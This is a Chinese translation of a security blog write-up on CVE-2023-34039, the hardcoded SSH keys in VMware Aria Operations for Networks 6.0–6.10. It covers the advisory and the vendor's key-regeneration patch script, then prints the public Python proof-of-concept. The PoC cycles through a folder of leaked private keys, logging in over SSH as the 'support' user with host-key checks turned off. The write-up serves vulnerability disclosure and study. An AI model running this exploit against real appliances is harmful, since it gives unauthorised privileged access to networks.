背景介绍
Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. VMware has evaluated the severity of this issue to be in the critical severity range with a maximum CVSSv3 base score of 9.8 CVE-2023-34039.
由于缺乏唯一的加密密钥生成,Aria Operations for Networks 包含身份验证绕过漏洞, VMware 已评估此问题的严重性处于关键严重范围内,CVSSv3 评分为 9.8, CVE-2023-34039。
ProjectDiscovery 的安全研究人员 Harsh Jaiswal (@rootxharsh) 和 Rahul Maini (@iamnoooob) 向 VMWare 报告了该漏洞。
同时VMware还提到:
具有 Aria Operations for Networks 网络访问权限的恶意行为者可以绕过 SSH 身份验证来访问 Aria Operations for Networks CLI。
有趣的是,VMware 将此漏洞命名为“网络身份验证绕过”,但在原作者看来,没有任何内容被绕过,虽然有 SSH 身份验证,但VMware 忘记了重新生成密钥。
看完以上两个描述后,原作者意识到这一定是 SSH 密钥硬编码问题, VMware 的 Aria Operations for Networks 已将其密钥从版本 6.0 硬编码到了 6.10。
补丁分析
VMware 已发布多个补丁文件供用户应用于其实例。这些补丁中的众多文件之一就是 bash 脚本。
refresh_ssh_keys() {
log "Remove old public key from authorized_keys file for support user"
chmod 666 /home/support/.ssh/authorized_keys
sed -i "s#$(sudo cat /home/support/.ssh/id_rsa_vnera_keypair.pub)##" /home/support/.ssh/authorized_keys
log "Remove old keys"
rm -f /home/support/.ssh/id_rsa_vnera_keypair
rm -f /home/support/.ssh/id_rsa_vnera_keypair.pub
rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair
rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub
log "Generate new keypair for support user"
ssh-keygen -q -t rsa -f /home/support/.ssh/id_rsa_vnera_keypair -N ''
log "Copy new keys for ubuntu user"
cp /home/support/.ssh/id_rsa_vnera_keypair /home/ubuntu/.ssh/
cp /home/support/.ssh/id_rsa_vnera_keypair.pub /home/ubuntu/.ssh/
log "Add new public key file to home/support/.ssh/authorized_keys"
cat /home/support/.ssh/id_rsa_vnera_keypair.pub >> /home/support/.ssh/authorized_keys
chown support:support /home/support/.ssh/authorized_keys
log "Provide right permissions to ssh files generated"
chmod 400 /home/support/.ssh/id_rsa_vnera_keypair
chmod 400 /home/support/.ssh/id_rsa_vnera_keypair.pub
chmod 640 /home/support/.ssh/authorized_keys
chown support:support /home/support/.ssh/id_rsa_vnera_keypair
chown support:support /home/support/.ssh/id_rsa_vnera_keypair.pub
chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair
chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub
chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair
chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub
log "Remove Empty Lines from authorized_keys files"
sed -i '/^$/d' /home/support/.ssh/authorized_keys
}
可以看到 refresh_ssh_keys
函数负责覆盖 support
和 ubuntu
用户当前的 SSH 密钥,值得注意的是,两个用户都拥有相同的密钥,并且同属 sudoers 组,没有任何限制。
寻找‘密钥’
利用此漏洞的主要挑战是 VMware 的 Aria Operations for Networks 的每个版本都具有唯一的 SSH 密钥,为了创建一个功能齐全的漏洞利用程序,必须收集该产品不同版本的所有密钥,经过一段时间,原作者终于收集到了6.0到6.10版本的所有密钥,最新版本 6.11 不容易受到此问题的影响,因为 VMware 在发布之前已修复了该问题。
该产品在实现时由两个节点组成,一个称为 Platform
,另一个称为 Collector
,基本上是两台不同的机器,漏洞利用程序包含所有版本中这两个节点的密钥。
漏洞验证(PoC)演示
PoC代码
目前该代码已在GitHub公开。
"""
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
Version: All versions from 6.0 to 6.10
Discovered by: Harsh Jaiswal (@rootxharsh) and Rahul Maini (@iamnoooob) at ProjectDiscovery Research
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/vmware-vrealize-network-insight-ssh-key-rce-cve-2023-34039/
"""
import argparse
import os
import subprocess
parser = argparse.ArgumentParser()
parser.add_argument('--target', '-t', help='Target IP address (192.168.1.1)', required=True)
parser.add_argument('--port', '-p', help='Target SSH Port', default='22', required=False)
args = parser.parse_args()
print("""(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
""")
def sanity_check():
if os.name == 'posix':
os.system('chmod -R 700 keys/')
def exploit():
for root, dirs, files in os.walk("keys"):
for file in files:
key_file = str(os.path.join(root, file))
print(f"(*) Trying key: {key_file}\n")
ssh_command = ['ssh', '-i', key_file, 'support@' + args.target, '-p', args.port, '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'BatchMode=yes', '2>/dev/null']
try:
ssh_command = ' '.join(ssh_command)
coutput = os.system(ssh_command)
except Exception as e:
log = f"(-) Failed connecting to {args.target}:{args.port} with key {key_file}!"
continue
sanity_check()
exploit()
原文出处:https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/
内容由骨哥翻译并整理。